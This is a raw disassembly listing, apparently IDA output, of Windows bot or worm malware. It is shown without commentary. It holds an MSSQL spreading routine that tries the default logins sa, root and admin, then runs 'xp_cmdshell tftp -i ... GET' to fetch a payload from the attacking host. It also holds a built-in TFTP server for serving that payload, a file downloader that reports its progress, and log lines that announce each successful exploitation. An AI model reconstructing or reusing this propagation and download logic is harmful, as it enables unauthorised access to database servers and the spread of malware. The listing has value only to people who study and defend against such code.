cmp [esp+8+arg_8], ebx
jnz short loc_41AC83
mov dword ptr [esp+8+arg_84], esi
mov dword ptr [esp+8+arg_7C], esi
mov [esp+8+arg_88], 2EBh
loc_41AC7C: ; CODE XREF: sub_41A9DE+27D�j
mov [esp+8+arg_80], ebx
loc_41AC83: ; CODE XREF: sub_41A9DE+283�j
call sub_403363
cdq
mov esi, 0FAh
mov ecx, esi
idiv ecx
inc edx
mov [esp+8+arg_78], edx
call sub_403363
cdq
idiv esi
mov eax, [esp+8+arg_8]
shl eax, 4
mov edi, ds:dword_424628[eax]
push edi
mov dword ptr [esp+0Ch+arg_90], ebx
mov [esp+0Ch+arg_1C], eax
mov [esp+0Ch+arg_18], edi
inc edx
mov [esp+0Ch+arg_8C], edx
call sub_4036E0
mov esi, eax
cmp esi, ebx
pop ecx
mov [esp+8+arg_4], esi
jz loc_41B105
lea eax, [edi-2]
push eax
push 90h
push esi
call sub_407B70
lea edi, [esi+edi-2]
xor eax, eax
stosw
mov eax, [esp+14h+arg_1C]
mov eax, ds:dword_424630[eax]
lea edi, [eax+esi]
mov esi, offset dword_42461C
movsd
movsw
add eax, 7
movsb
mov [esp+14h+arg_14], eax
xor eax, eax
mov [esp+14h+arg_200], bl
lea edi, [esp+14h+arg_201]
stosd
stosd
stosd
stosw
stosb
add esp, 0Ch
mov edi, 0FFh
push edi
lea eax, [esp+0Ch+arg_311]
push ebx
push eax
mov [esp+14h+arg_310], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+0Ch+arg_211]
push ebx
push eax
mov [esp+14h+arg_210], bl
call sub_407B70
add esp, 0Ch
cmp [esp+8+arg_1FD], bl
jz loc_41ADF3
call sub_419347
test al, al
jnz short loc_41ADDA
push ds:dword_4269BC
lea esi, [esp+0Ch+arg_200]
call sub_418FC6
lea esi, [esp+0Ch+arg_310]
mov ebx, offset byte_425061
mov [esp+0Ch+var_C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push ds:dword_426594
lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_1 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402AEE
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41ADD1: ; CODE XREF: sub_41A9DE+3F8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41ADD1
jmp short loc_41AE56
; ---------------------------------------------------------------------------
loc_41ADDA: ; CODE XREF: sub_41A9DE+395�j
push 100h
lea esi, [esp+0Ch+arg_210]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41AE60
; ---------------------------------------------------------------------------
loc_41ADF3: ; CODE XREF: sub_41A9DE+388�j
push ds:dword_4269BC
lea esi, [esp+0Ch+arg_200]
call sub_418FC6
lea esi, [esp+0Ch+arg_310]
mov ebx, offset byte_425061
mov [esp+0Ch+var_C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push ds:dword_426594
lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_2 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402AEE
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41AE4F: ; CODE XREF: sub_41A9DE+476�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41AE4F
loc_41AE56: ; CODE XREF: sub_41A9DE+3FA�j
sub eax, ecx
mov [esp+eax+8+arg_210], 0
loc_41AE60: ; CODE XREF: sub_41A9DE+413�j
lea eax, [esp+8+arg_210]
push eax
mov esi, offset dword_433950
push esi
call sub_41432A
test eax, eax
pop ecx
pop ecx
mov [esp+8+arg_C], eax
jz loc_41B126
mov edi, offset dword_424614
push edi
push eax
push esi
push 1
mov ebx, offset dword_433AC8
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41AEB4
push edi
push [esp+0Ch+arg_C]
push esi
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz loc_41B126
loc_41AEB4: ; CODE XREF: sub_41A9DE+4BC�j
mov esi, [esp+8+arg_4]
dec eax
push eax
mov eax, [esp+0Ch+arg_14]
add eax, esi
push ebx
push eax
call sub_407BF0
mov eax, [esp+14h+arg_1C]
mov eax, ds:dword_42462C[eax]
add esp, 0Ch
cmp [esp+8+arg_8], 1
jnz short loc_41AF07
mov ecx, ds:dword_433C68
mov [eax+esi], ecx
mov ecx, ds:dword_424644
add eax, 0Ch
mov [eax+esi], ecx
mov ecx, ds:dword_424644
lea eax, [eax+esi+24h]
mov [eax], ecx
mov ecx, ds:dword_424644
mov [eax+0Ch], ecx
jmp short loc_41AF21
; ---------------------------------------------------------------------------
loc_41AF07: ; CODE XREF: sub_41A9DE+4FB�j
cmp [esp+8+arg_8], 0
jnz short loc_41AF21
push 10h
add eax, esi
pop ecx
loc_41AF13: ; CODE XREF: sub_41A9DE+541�j
mov edx, ds:dword_424644
mov [eax], edx
add eax, 4
dec ecx
jnz short loc_41AF13
loc_41AF21: ; CODE XREF: sub_41A9DE+527�j
; sub_41A9DE+52E�j
mov edi, [esp+8+arg_18]
add edi, 42h
push edi
call sub_4036E0
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_41B13C
push edi
push 0
push ebx
call sub_407B70
push 5
pop ecx
lea esi, [esp+14h+arg_94]
mov edi, ebx
rep movsd
mov esi, [esp+14h+arg_18]
mov eax, esi
test eax, eax
mov [esp+14h+arg_C], eax
fild [esp+14h+arg_C]
jge short loc_41AF68
fadd ds:flt_420D38
loc_41AF68: ; CODE XREF: sub_41A9DE+582�j
fmul ds:dbl_420D30
add esp, 4
fstp [esp+10h+arg_C]
fld [esp+10h+arg_C]
fstp qword ptr [esp]
call sub_403DA0
fstp [esp+10h+arg_C]
fld [esp+10h+arg_C]
call sub_41C156
and dword ptr [ebx+18h], 0
push esi
push [esp+14h+arg_4]
mov [ebx+1Ch], eax
mov [ebx+14h], eax
lea eax, [ebx+20h]
push eax
call sub_407BF0
add esp, 14h
lea eax, [esi+20h]
jmp short loc_41AFAF
; ---------------------------------------------------------------------------
loc_41AFAE: ; CODE XREF: sub_41A9DE+5D3�j
inc eax
loc_41AFAF: ; CODE XREF: sub_41A9DE+5CE�j
test al, 3
jnz short loc_41AFAE
push 7
lea edi, [ebx+eax]
pop ecx
push [esp+8+arg_4]
add eax, 1Ch
lea esi, [esp+0Ch+arg_78]
rep movsd
mov [esp+0Ch+arg_14], eax
call sub_403603
pop ecx
push 6
xor eax, eax
pop ecx
lea edi, [esp+8+arg_28]
rep stosd
mov byte ptr [esp+8+arg_28+1], al
mov byte ptr [esp+8+arg_28+2], al
lea edi, [esp+8+arg_40]
stosd
xor esi, esi
stosd
stosd
push esi
push esi
stosd
push 1
push esi
mov byte ptr [esp+18h+arg_28], 5
mov byte ptr [esp+18h+arg_28+3], 3
mov [esp+18h+arg_2C], 10h
mov word ptr [esp+18h+arg_30+2], si
mov [esp+18h+arg_34], esi
mov word ptr [esp+18h+arg_3C], si
mov word ptr [esp+18h+arg_3C+2], 1Fh
stosd
call ds:dword_41D09C
mov dword ptr [esp+8+arg_50], eax
mov byte ptr [esp+0Fh], 0
mov [esp+8+arg_4], esi
loc_41B030: ; CODE XREF: sub_41A9DE+6E4�j
cmp [esp+8+arg_4], 2
jge loc_41B0C8
inc [esp+8+arg_4]
push 1
push 10B8h
push [esp+10h+arg_14]
lea esi, [esp+14h+arg_28]
push ebx
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [esp+30h+arg_0]
rep movsd
call sub_416D6C
add esp, 2Ch
test al, al
jz short loc_41B0C8
cmp dword ptr [esp+8+arg_50], 0
jz short loc_41B0BD
lea eax, [esp+8+arg_40]
push eax
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_0]
call ds:dword_41D078
test eax, eax
jnz short loc_41B0A2
call ds:dword_41D0F0
cmp eax, 3E5h
jnz short loc_41B0BD
loc_41B0A2: ; CODE XREF: sub_41A9DE+6B5�j
push 3E8h
push dword ptr [esp+0Ch+arg_50]
call ds:dword_41D07C
cmp eax, 102h
jnz short loc_41B0BD
mov byte ptr [esp+0Fh], 1
loc_41B0BD: ; CODE XREF: sub_41A9DE+690�j
; sub_41A9DE+6C2�j ...
cmp byte ptr [esp+0Fh], 0
jz loc_41B030
loc_41B0C8: ; CODE XREF: sub_41A9DE+657�j
; sub_41A9DE+689�j
push [esp+8+arg_0]
mov esi, ds:dword_41D0DC
call esi
push ebx
call sub_403603
cmp [esp+10h+arg_4C], 0
pop ecx
jz short loc_41B0E8
push [esp+0Ch+arg_4C]
call esi
loc_41B0E8: ; CODE XREF: sub_41A9DE+702�j
cmp byte ptr [esp+0Fh], 0
jnz short loc_41B149
cmp [esp+0Ch+arg_4], 0
jnz short loc_41B10F
mov [esp+0Ch+arg_4], 1
xor ebx, ebx
jmp loc_41AA2A
; ---------------------------------------------------------------------------
loc_41B105: ; CODE XREF: sub_41A9DE+1E5�j
; sub_41A9DE+2F7�j
push [esp+8+arg_0]
call ds:dword_41D0DC
loc_41B10F: ; CODE XREF: sub_41A9DE+51�j
; sub_41A9DE+B9�j ...
xor al, al
loc_41B111: ; CODE XREF: sub_41A9DE+7BD�j
mov ecx, [esp+0Ch+arg_6410]
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B126: ; CODE XREF: sub_41A9DE+49D�j
; sub_41A9DE+4D0�j
push [esp+8+arg_0]
call ds:dword_41D0DC
push [esp+0Ch+arg_0]
loc_41B134: ; CODE XREF: sub_41A9DE+769�j
call sub_403603
pop ecx
jmp short loc_41B10F
; ---------------------------------------------------------------------------
loc_41B13C: ; CODE XREF: sub_41A9DE+555�j
push [esp+8+arg_0]
call ds:dword_41D0DC
push esi
jmp short loc_41B134
; ---------------------------------------------------------------------------
loc_41B149: ; CODE XREF: sub_41A9DE+70F�j
push [esp+0Ch+arg_20]
call ds:dword_41D260
push eax
mov eax, [esp+10h+arg_1EC]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS_ ; "%s: Exploited: %s."
lea eax, [esp+18h+arg_EC]
push eax
push [esp+1Ch+arg_1F8]
push offset dword_4269BC
call sub_417361
mov eax, [esp+24h+arg_1EC]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
mov al, [esp+0Fh]
jmp loc_41B111
sub_41A9DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CD8h
sub_41B1A0 proc near ; DATA XREF: J8@F_7_S:0042457C�o
var_D54 = dword ptr -0D54h
var_D50 = dword ptr -0D50h
var_D4C = dword ptr -0D4Ch
var_D48 = dword ptr -0D48h
var_D44 = byte ptr -0D44h
var_D40 = dword ptr -0D40h
var_D3C = dword ptr -0D3Ch
var_D38 = dword ptr -0D38h
var_D34 = dword ptr -0D34h
var_D30 = dword ptr -0D30h
var_D2C = dword ptr -0D2Ch
var_D26 = byte ptr -0D26h
var_D25 = byte ptr -0D25h
var_D24 = byte ptr -0D24h
var_C24 = dword ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = dword ptr -0C18h
var_C14 = byte ptr -0C14h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-0CD8h]
sub esp, 0D54h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+0CD8h+var_4], eax
push ebx
push esi
push edi
push 44h
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+0CD8h+var_14], bl
lea esi, [ebp+0CD8h+arg_0]
lea edi, [ebp+0CD8h+var_D24]
rep movsd
lea edi, [ebp+0CD8h+var_13]
stosd
stosd
stosd
stosw
stosb
mov eax, [ebp+0CD8h+var_C20]
mov [ebp+0CD8h+var_D40], eax
lea eax, [ebp+0CD8h+var_D34]
push eax
push ebx
push 1
mov [ebp+0CD8h+var_D26], bl
mov [ebp+0CD8h+var_D54], offset aSa ; "sa"
mov [ebp+0CD8h+var_D50], offset aRoot ; "root"
mov [ebp+0CD8h+var_D4C], offset aAdmin ; "admin"
mov [ebp+0CD8h+var_D48], ebx
mov [ebp+0CD8h+var_D25], bl
mov [ebp+0CD8h+var_D2C], ebx
mov [ebp+0CD8h+var_D30], ebx
call sub_402630
test ax, ax
jz short loc_41B23A
loc_41B220: ; CODE XREF: sub_41B1A0+AE�j
xor al, al
loc_41B222: ; CODE XREF: sub_41B1A0+CF�j
mov ecx, [ebp+0CD8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 0CD8h
leave
retn
; ---------------------------------------------------------------------------
loc_41B23A: ; CODE XREF: sub_41B1A0+7E�j
push 0FFFFFFFAh
push 3
push 0C8h
push [ebp+0CD8h+var_D34]
call sub_402624
test ax, ax
jnz short loc_41B220
lea eax, [ebp+0CD8h+var_D2C]
push eax
push [ebp+0CD8h+var_D34]
push 2
call sub_402630
test ax, ax
jz short loc_41B271
loc_41B263: ; CODE XREF: sub_41B1A0+22B�j
push [ebp+0CD8h+var_D34]
push 1
call sub_402636
mov al, bl
jmp short loc_41B222
; ---------------------------------------------------------------------------
loc_41B271: ; CODE XREF: sub_41B1A0+C1�j
mov edi, ds:dword_41D260
lea ecx, [ebp+0CD8h+var_D54]
mov [ebp+0CD8h+var_D3C], ecx
loc_41B27D: ; CODE XREF: sub_41B1A0+1D0�j
cmp ds:off_424650, ebx
mov [ebp+0CD8h+var_D38], ebx
jz loc_41B365
mov esi, [ecx]
mov eax, offset off_424650
loc_41B293: ; CODE XREF: sub_41B1A0+16B�j
lea ecx, [ebp+0CD8h+var_D26]
push ecx
push dword ptr [eax]
push esi
push [ebp+0CD8h+var_C1C]
push [ebp+0CD8h+var_D40]
call edi
push eax
lea eax, [ebp+0CD8h+var_414]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_4030B5
lea eax, [ebp+0CD8h+var_414]
add esp, 1Ch
lea ecx, [eax+1]
loc_41B2C3: ; CODE XREF: sub_41B1A0+128�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41B2C3
push ebx
sub eax, ecx
lea ecx, [ebp+0CD8h+var_D44]
push ecx
push 400h
lea ecx, [ebp+0CD8h+var_C14]
push ecx
push eax
lea eax, [ebp+0CD8h+var_414]
push eax
push ebx
push [ebp+0CD8h+var_D2C]
call sub_40262A
movzx eax, ax
cmp ax, bx
jz short loc_41B30F
cmp ax, 1
jz short loc_41B30F
inc [ebp+0CD8h+var_D38]
mov eax, [ebp+0CD8h+var_D38]
lea eax, ds:424650h[eax*4]
cmp [eax], ebx
jnz short loc_41B293
jmp short loc_41B365
; ---------------------------------------------------------------------------
loc_41B30F: ; CODE XREF: sub_41B1A0+154�j
; sub_41B1A0+15A�j
lea eax, [ebp+0CD8h+var_D30]
push eax
push [ebp+0CD8h+var_D2C]
push 3
call sub_402630
push ds:dword_4269BC
lea esi, [ebp+0CD8h+var_14]
call sub_418FC6
mov eax, esi
push eax
lea eax, [ebp+0CD8h+var_814]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax
call sub_4030B5
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp+0CD8h+var_814]
push eax
push [ebp+0CD8h+var_D30]
call sub_40263C
test ax, ax
jz short loc_41B378
push [ebp+0CD8h+var_D30]
push 3
call sub_402636
loc_41B365: ; CODE XREF: sub_41B1A0+E6�j
; sub_41B1A0+16D�j
mov ecx, [ebp+0CD8h+var_D3C]
add ecx, 4
cmp [ecx], ebx
mov [ebp+0CD8h+var_D3C], ecx
jnz loc_41B27D
jmp short loc_41B3BE
; ---------------------------------------------------------------------------
loc_41B378: ; CODE XREF: sub_41B1A0+1B9�j
push [ebp+0CD8h+var_D40]
mov [ebp+0CD8h+var_D25], 1
call edi
push eax
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS__0 ; "%s: Exploited %s."
lea eax, [ebp+0CD8h+var_D24]
push eax
push [ebp+0CD8h+var_C18]
push offset dword_4269BC
call sub_417361
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
loc_41B3BE: ; CODE XREF: sub_41B1A0+1D6�j
push [ebp+0CD8h+var_D2C]
push 2
call sub_402636
mov bl, [ebp+0CD8h+var_D25]
jmp loc_41B263
sub_41B1A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3D0 proc near ; DATA XREF: sub_41B5D2+15A�o
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = word ptr -224h
var_222 = word ptr -222h
var_220 = byte ptr -220h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 240h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
jnz short loc_41B3F6
loc_41B3EF: ; CODE XREF: sub_41B3D0+42�j
; sub_41B3D0+5D�j ...
push ebx
call ds:dword_41D08C
loc_41B3F6: ; CODE XREF: sub_41B3D0+1D�j
lea edi, [ebp+var_18]
movsd
movsd
push 11h
movsd
push 2
push 2
movsd
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov [ebp+var_230], eax
jz short loc_41B3EF
push offset aRb ; "rb"
push offset dword_4269E8
call sub_4031F4
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_228], eax
jz short loc_41B3EF
push eax
mov [ebp+var_22C], ebx
mov [ebp+var_23C], 10h
call sub_403AF3
test eax, eax
pop ecx
jnz loc_41B53E
mov esi, ds:dword_41D278
loc_41B454: ; CODE XREF: sub_41B3D0+168�j
push 204h
lea eax, [ebp+var_224]
push ebx
push eax
call sub_407B70
add esp, 0Ch
xor eax, eax
inc [ebp+var_22C]
push [ebp+var_22C]
lea edi, [ebp+var_238]
stosd
call esi
push 3
mov [ebp+var_222], ax
call esi
push [ebp+var_228]
mov [ebp+var_224], ax
push 200h
lea eax, [ebp+var_220]
push 1
push eax
call sub_403D7F
mov edi, [ebp+var_230]
add esp, 10h
push 10h
lea ecx, [ebp+var_18]
push ecx
push ebx
add eax, 4
push eax
lea eax, [ebp+var_224]
push eax
push edi
call ds:dword_41D24C
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
lea eax, [ebp+var_23C]
push eax
lea eax, [ebp+var_18]
push eax
push ebx
push 4
lea eax, [ebp+var_238]
push eax
push edi
call ds:dword_41D25C
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
push [ebp+var_238]
call ds:dword_41D254
cmp ax, 4
jnz loc_41B5BA
push [ebp+var_238+2]
call ds:dword_41D254
cmp ax, word ptr [ebp+var_22C]
jnz loc_41B5BA
push [ebp+var_228]
call sub_403AF3
test eax, eax
pop ecx
jz loc_41B454
loc_41B53E: ; CODE XREF: sub_41B3D0+78�j
inc ds:dword_43394C
push 100h
call sub_402648
mov esi, eax
push esi
call sub_402A45
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
add esp, 0Ch
push ds:dword_43394C
push [ebp+var_14]
call ds:dword_41D260
push eax
push offset aTftpSendComple ; "TFTP: Send Complete To %s. %d Total Sen"...
push esi
push 0
push offset dword_4269BC
call sub_417361
push esi
call sub_402B9B
add esp, 1Ch
push [ebp+var_230]
call ds:dword_41D224
push [ebp+var_228]
call sub_4034C4
pop ecx
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
xor eax, eax
pop ebx
call sub_402710
leave
retn 4
; ---------------------------------------------------------------------------
loc_41B5BA: ; CODE XREF: sub_41B3D0+100�j
; sub_41B3D0+125�j ...
push edi
call ds:dword_41D224
push [ebp+var_228]
call sub_4034C4
pop ecx
jmp loc_41B3EF
sub_41B3D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B5D2 proc near ; DATA XREF: sub_41B775+53�o
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = byte ptr -138h
var_134 = dword ptr -134h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 14Ch
mov eax, ds:dword_423064
xor eax, esp
mov [esp+14Ch+var_4], eax
push ebx
push esi
push edi
push 11h
xor esi, esi
push 2
inc esi
push 2
mov [esp+164h+var_140], esi
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov ds:dword_4269E4, eax
jnz short loc_41B61B
xor ebx, ebx
loc_41B60E: ; CODE XREF: sub_41B5D2+C1�j
mov ds:byte_433945, bl
loc_41B614: ; CODE XREF: sub_41B5D2+BF�j
push ebx
call ds:dword_41D08C
loc_41B61B: ; CODE XREF: sub_41B5D2+38�j
push 4
lea ecx, [esp+15Ch+var_140]
push ecx
push 4
push 0FFFFh
push eax
call ds:dword_41D250
xor eax, eax
lea edi, [esp+158h+var_14]
stosd
stosd
stosd
stosd
push 45h
mov [esp+15Ch+var_14], 2
call ds:dword_41D278
mov [esp+158h+var_12], ax
push 10h
lea eax, [esp+15Ch+var_14]
push eax
push ds:dword_4269E4
xor ebx, ebx
mov [esp+164h+var_10], ebx
call ds:dword_41D26C
cmp eax, 0FFFFFFFFh
jnz loc_41B744
push ds:dword_4269E4
call ds:dword_41D224
cmp ds:byte_433945, bl
jz short loc_41B614
jmp loc_41B60E
; ---------------------------------------------------------------------------
loc_41B698: ; CODE XREF: sub_41B5D2+178�j
mov eax, ds:dword_4269E4
mov [esp+158h+var_11C], eax
xor eax, eax
lea edi, [esp+158h+var_148]
stosd
stosd
lea eax, [esp+158h+var_148]
push eax
push ebx
push ebx
lea eax, [esp+164h+var_120]
push eax
push ebx
mov [esp+16Ch+var_120], esi
mov [esp+16Ch+var_148], 5
mov [esp+16Ch+var_144], ebx
call ds:dword_41D258
test eax, eax
jle short loc_41B744
xor eax, eax
lea edi, [esp+158h+var_134]
stosd
stosd
stosd
stosd
stosd
lea eax, [esp+158h+var_13C]
push eax
lea eax, [esp+15Ch+var_14]
push eax
push ebx
push 14h
lea eax, [esp+168h+var_134]
push eax
push ds:dword_4269E4
mov [esp+170h+var_13C], 10h
call ds:dword_41D25C
cmp eax, 0FFFFFFFFh
jz short loc_41B744
push [esp+158h+var_134]
inc ds:dword_433948
call ds:dword_41D254
cmp ax, si
jnz short loc_41B744
lea eax, [esp+158h+var_138]
push eax
push ebx
lea eax, [esp+160h+var_14]
push eax
push offset sub_41B3D0
push ebx
push ebx
call ds:dword_41D110
push 3E8h
call ds:dword_41D0FC
loc_41B744: ; CODE XREF: sub_41B5D2+A7�j
; sub_41B5D2+FC�j ...
cmp ds:byte_433945, bl
jnz loc_41B698
push ds:dword_4269E4
call ds:dword_41D224
mov ecx, [esp+158h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_41B5D2 endp
; =============== S U B R O U T I N E =======================================
sub_41B775 proc near ; CODE XREF: sub_401F1C+5A�p
; J8@F_7_S:0041BFB5�p
push 4
mov eax, offset loc_41C274
call sub_4045CC
xor ebx, ebx
cmp ds:byte_433945, bl
jz short loc_41B78F
loc_41B78B: ; CODE XREF: sub_41B775+74�j
mov al, 1
jmp short loc_41B7F3
; ---------------------------------------------------------------------------
loc_41B78F: ; CODE XREF: sub_41B775+14�j
mov edi, 100h
push edi
push ebx
mov esi, offset dword_4269E8
push esi
call sub_407B70
add esp, 0Ch
push edi
push esi
push ebx
call ds:dword_41D0E4
push eax
call ds:dword_41D060
push 8
call sub_40304B
mov esi, eax
pop ecx
mov [ebp-10h], esi
cmp esi, ebx
mov [ebp-4], ebx
jz short loc_41B7DB
push offset sub_41B5D2
xor ecx, ecx
mov edi, offset aTftpServer ; "TFTP Server"
call sub_4140AB
jmp short loc_41B7DD
; ---------------------------------------------------------------------------
loc_41B7DB: ; CODE XREF: sub_41B775+51�j
xor eax, eax
loc_41B7DD: ; CODE XREF: sub_41B775+64�j
cmp [eax+4], ebx
jz short loc_41B7EB
mov ds:byte_433945, 1
jmp short loc_41B78B
; ---------------------------------------------------------------------------
loc_41B7EB: ; CODE XREF: sub_41B775+6B�j
mov ds:byte_433945, bl
xor al, al
loc_41B7F3: ; CODE XREF: sub_41B775+18�j
call sub_40466B
retn
sub_41B775 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7F9 proc near ; CODE XREF: sub_40177B+6C�p
; sub_4019F3+6C�p ...
var_3DC = dword ptr -3DCh
var_3D8 = byte ptr -3D8h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 3E0h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+3E0h+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [esp+3ECh+var_3DC], eax
lea eax, [esp+3ECh+var_207]
push ebx
push eax
mov [esp+3F4h+var_208], bl
call sub_407B70
add esp, 0Ch
push 0FFh
lea eax, [esp+3ECh+var_307]
push ebx
push eax
mov [esp+3F4h+var_308], bl
call sub_407B70
add esp, 0Ch
lea eax, [esp+3E8h+var_3D8]
call sub_4143A0
push [esp+3E8h+var_3DC]
lea eax, [esp+3ECh+var_208]
push offset aS_15 ; "%s"
push esi
push eax
call sub_402AEE
lea eax, [esp+3F8h+var_208]
add esp, 10h
lea esi, [eax+1]
loc_41B886: ; CODE XREF: sub_41B7F9+92�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41B886
lea ecx, [esp+3E8h+var_3D8]
push ecx
sub eax, esi
push eax
lea ecx, [esp+3F0h+var_208]
call sub_416C60
push 200h
lea eax, [esp+3F4h+var_208]
push ebx
push eax
call sub_407B70
lea eax, [esp+3FCh+var_308]
add esp, 14h
push eax
lea ebx, [esp+3ECh+var_3D8]
call sub_416AE0
pop ecx
push 0C0h
push 0
push edi
call sub_407B70
add esp, 0Ch
xor esi, esi
loc_41B8DB: ; CODE XREF: sub_41B7F9+114�j
movzx eax, [esp+esi+3E8h+var_308]
push eax
push edi
push offset aSX ; "%s%X"
push 0BFh
push edi
call sub_402AEE
mov eax, edi
add esp, 14h
lea ecx, [eax+1]
loc_41B8FD: ; CODE XREF: sub_41B7F9+109�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41B8FD
sub eax, ecx
inc esi
cmp esi, 40h
mov [eax+edi], dl
jl short loc_41B8DB
mov ecx, [esp+3E8h+var_4]
pop esi
pop ebx
xor ecx, esp
mov eax, edi
call sub_402710
mov esp, ebp
pop ebp
retn
sub_41B7F9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 754h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+750h], eax
push ebx
push esi
mov esi, [ebp+8]
push edi
mov ecx, 0C9h
lea edi, [esp+28h]
rep movsd
xor ebx, ebx
push ebx
push ebx
push ebx
movsw
push ebx
push offset aMozilla5_0 ; "Mozilla/5.0"
movsb
call ds:dword_41D21C
mov esi, eax
lea eax, [esp+24Bh]
push eax
lea eax, [esp+14Fh]
push eax
push offset aDlDownloadingS ; "DL: Downloading %s to %s"
lea eax, [esp+34h]
push eax
push dword ptr [esp+35Dh]
mov edi, offset dword_4269BC
push edi
call sub_417361
add esp, 18h
push ebx
push ebx
push ebx
push ebx
lea eax, [esp+15Bh]
push eax
push esi
call ds:dword_41D218
cmp esi, ebx
mov [esp+1Ch], eax
jz loc_41BB44
cmp eax, ebx
jz loc_41BB3D
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [esp+263h]
push eax
call ds:dword_41D06C
mov [esp+18h], eax
call ds:dword_41D108
mov [esp+20h], eax
mov [esp+10h], ebx
mov esi, 400h
loc_41B9EC: ; CODE XREF: J8@F_7_S:0041BA44�j
push esi
lea eax, [esp+35Ch]
push ebx
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+14h]
push eax
push esi
lea eax, [esp+360h]
push eax
push dword ptr [esp+28h]
call ds:dword_41D214
push ebx
lea eax, [esp+28h]
push eax
push dword ptr [esp+1Ch]
lea eax, [esp+364h]
push eax
push dword ptr [esp+28h]
call ds:dword_41D088
test eax, eax
jz loc_41BAEF
mov eax, [esp+14h]
add [esp+10h], eax
cmp eax, ebx
ja short loc_41B9EC
call ds:dword_41D108
sub eax, [esp+20h]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ecx, eax
cmp ecx, ebx
jnz short loc_41BA62
xor ecx, ecx
inc ecx
loc_41BA62: ; CODE XREF: J8@F_7_S:0041BA5D�j
mov eax, [esp+10h]
xor edx, edx
div ecx
shr eax, 0Ah
push eax
push ecx
push dword ptr [esp+18h]
lea eax, [esp+257h]
push eax
push offset aDlDownloadSIBy ; "DL: Download %s (%i Bytes) finished in "...
lea eax, [esp+3Ch]
push eax
push dword ptr [esp+365h]
